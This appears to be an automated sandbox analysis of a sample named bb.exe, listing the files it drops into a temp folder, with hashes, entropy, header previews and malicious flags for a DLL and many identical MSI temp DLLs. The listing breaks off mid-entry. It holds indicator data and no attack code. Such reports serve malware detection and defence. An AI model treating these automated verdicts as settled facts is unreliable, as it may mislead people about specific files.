                                                                                                      SHA1:5867E7E4FBBAE2CB922D76926E425ED846C44BCC
                                                                                                      SHA-256:D51BEB033D366F295E3C342767DCE17DE6CB6395FB9086FF3063325F6DF22F62
                                                                                                      SHA-512:717234ED347AB6F92C951085BFC0F91BA251F8BC65A00E00F67ACF8FF31DB452E09600CC5199FBC3B27E708494BB74C419E09CEA37E648B1249AE96EF5726397
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR..............46.....sRGB.........gAMA......a.....pHYs...%...%.IR$....+IDATx^..N.A.......b.($....pa\.n..Q7hFq...0.` ../ .....@.4.....:.n.......T'..z.-:.8_2.SUg.S.oz...+.?.P...V.(...v.(...O.(.FfBm...."...O.@..,.c......1F.@..,.c......1F.@..J..u....%9R...X...s.m/..#5.AnP.7VS..9R.....t.A.;P.}.AnPb'.i...A..+.z..;.^j.....:[..Q9...x.b.5....r............k.AnP.9t...W".!..Ay>....M%.....e.._~.......I.......G....es.r..'...d'...b.."2ZK2.D..[.W;.W...`..DZ..S[....g.i6...2.^...\)..38..y'+g.q...L-.e.\A...j<y..-Q...-fN.A..N.....z......k.....D......j.....@@%..<@%.PI.+.P..T......@. .,u.o.WB....W.n!.S.x....Q...h.v7.?`.5._<...@"..I..b...|N..._..'..4..(.....!.UB..'..4....G.'.....>...o]>..]w.i..t.....=D.....V.@.<..:..........S..z*.7x.2.%..=....^l...Q.=../...........I.t......%...v.A.0v:ON&.-O. ..|..l.)O...1+%^.M..>.X.>....#.1..b.`..#X ....1..b.`..#X ....1../......{....IEND.B`.

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\dictionarywinui.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (702), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):17587
                                                                                                      Entropy (8bit):5.028365090404569
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:XISk+/uXF6G/0tmk/0nmkQUFkjL7CD4QEgkRY0tmk/0nmkQUFkBXGR:XISs6GNYnpjLmD4QEgkOYnpBe
                                                                                                      MD5:A6DE2C84EEBBCA443D7630DB08302C8C
                                                                                                      SHA1:7B704DE72F0FFEE885FE5EE0A198BE000A0EF3E8
                                                                                                      SHA-256:2A04BEE6BA404B8E86FAC575F47864ED90FB3F05F3B520008B40DBED5D0C0BB2
                                                                                                      SHA-512:4798CC5BAE5D24BDE6922420CCC513A28E9535CD8B70D354D4B3FE919F39B334A4F619BCBA69C0CBD276CD881E6C1501343F3FD8F2D2A7566C41943025F09A52
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: Free Public License 1.0.0 Permission to use, copy, modify, and/or distribute this code for any purpose with or without fee is hereby granted. -->..<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:Windows10version1809="http://schemas.microsoft.com/winfx/2006/xaml/presentation?IsApiContractPresent(Windows.Foundation.UniversalApiContract, 7)".. xmlns:BelowWindows10version1809="http://schemas.microsoft.com/winfx/2006/xaml/presentation?IsApiContractNotPresent(Windows.Foundation.UniversalApiContract, 7)">.. <ResourceDictionary.ThemeDictionaries>.. <ResourceDictionary x:Key="Default">.. <ResourceDictionary.MergedDictionaries>.. <Windows10version1809:ColorPaletteResources Accent="#FF4F76B7" AltHigh="#FF000000" AltLow="#FF000000" AltMedium="#FF000000" AltMediumHigh="#FF000000" AltMediumLow="#FF0000

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\exclamic

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 50 x 69, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1729
                                                                                                      Entropy (8bit):7.1338258836706085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:e1hGHWwh82lYSKwSghVGyT3XyJ3VUflGiMZDGEdLWIkNubnHyx8tCrAUx8d:kJvnLihEyeJ3GNCWJqCMLQ8d
                                                                                                      MD5:8BC1FB1AF551315AC15BB51933CBBCAD
                                                                                                      SHA1:3BAA47215FCCC6128E7FA43674A527A7F132F2CB
                                                                                                      SHA-256:74E1343C539D2DEBC30C73C32B91016EA30C48486619DC47324C9E46C81CB2BA
                                                                                                      SHA-512:B6CA3F6FCBC74C598D020C27E14145955256966E3BE77607777A33DE4A91C67094A921E279C0755C7AEFF04BF34411EDD8C8FAED074BC0609984FBB8DF11B55E
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...2...E.............tEXtSoftware.Adobe ImageReadyq.e<...liTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:76B3B35C4DAAE11191B485BA280938C5" xmpMM:DocumentID="xmp.did:54F7F23CA12911ED83E6B38D59A0AA05" xmpMM:InstanceID="xmp.iid:54F7F23BA12911ED83E6B38D59A0AA05" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1932698b-7046-9c42-bfd7-15aee268cd76" stRef:documentID="xmp.did:76B3B35C4DAAE11191B485BA280938C5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..;.....IDATx..]H.Q.......he-]...Z..m...$].t#

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\info

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 50 x 69, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2043
                                                                                                      Entropy (8bit):7.371782426816929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:e1hGHWwh82lYSKwSMVkT3XyJ3VIMlGGQIsSA99NjeQ56yMAkCvaKNGu8Z1zv9Ego:kJvnLGOeJ3zaIc9V56yMzZ1zFEgn2pL/
                                                                                                      MD5:90BC43D1785A9598A85F3A736CBD62E8
                                                                                                      SHA1:BFAE814CD7A28439B7DC016D30BABBA010CCB7C1
                                                                                                      SHA-256:B6840929BA2276D7F9BB09379E15933D42BD4047C582C0E82718D892EE1F87B7
                                                                                                      SHA-512:2FC94064B40FC1B90A3AD311A7538F0527F3AF205CA0FAA195C0F753590156A24E3DAAFD082B1DE2948A1D3861EFD477643C41565881A1B67BFEA536C32B3EC7
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...2...E.............tEXtSoftware.Adobe ImageReadyq.e<...liTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:76B3B35C4DAAE11191B485BA280938C5" xmpMM:DocumentID="xmp.did:5DBFE84AA12911EDAA90FB99E76C401E" xmpMM:InstanceID="xmp.iid:5DBFE849A12911EDAA90FB99E76C401E" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5786eaf1-81a5-0849-a2ff-c48da1635061" stRef:documentID="xmp.did:76B3B35C4DAAE11191B485BA280938C5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.4QL...%IDATx..[HTA........j..].-+.4.R.n..KA.

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\lzmaextractor.dll

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):22848
                                                                                                      Entropy (8bit):6.876221158595019
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:lOw0clp5NZrrcrj4zL0/zL0s+Y7h7X2Ip4vDqjdAA1m5wMvaSu7wGo:lOAlPxmx+Y7N2Ip4Lqxf1mlv2U7
                                                                                                      MD5:17DD7ECBB68515799EF219C27751F38A
                                                                                                      SHA1:A4FF08C0F5FB89D7ECFE2B9A30989A023CC66231
                                                                                                      SHA-256:355EDA5278A9E48D4CBEF33E40ADF14C1B8FEE9902AB2B4A7F72FE13FB583540
                                                                                                      SHA-512:B90FB326D3318AB23CC6AA17E684DA6B0C98401C30F3A6341E78EF1917BDB5AD5EB51CF9C48FFC4B6738DA972A428C1E594A4973DB39A76CADFC3F65C95A5512
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u9X..jX..jX..j...kW..jX..jh..jA..k]..jA..kY..jA..jY..jX..jY..jA..kY..jRichX..j........................PE..L....=.d.........."!...$............@........ ...............................`......D[....@.........................P".......$.......@..h...............@=...P..\....!..p............................................ ..X............................text...)........................... ..`.rdata..X.... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc..\....P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI277B.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2E04.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2E63.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2EB2.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2F10.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2F50.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2F9F.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI2FCF.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI300E.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI305E.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI430C.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI438A.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
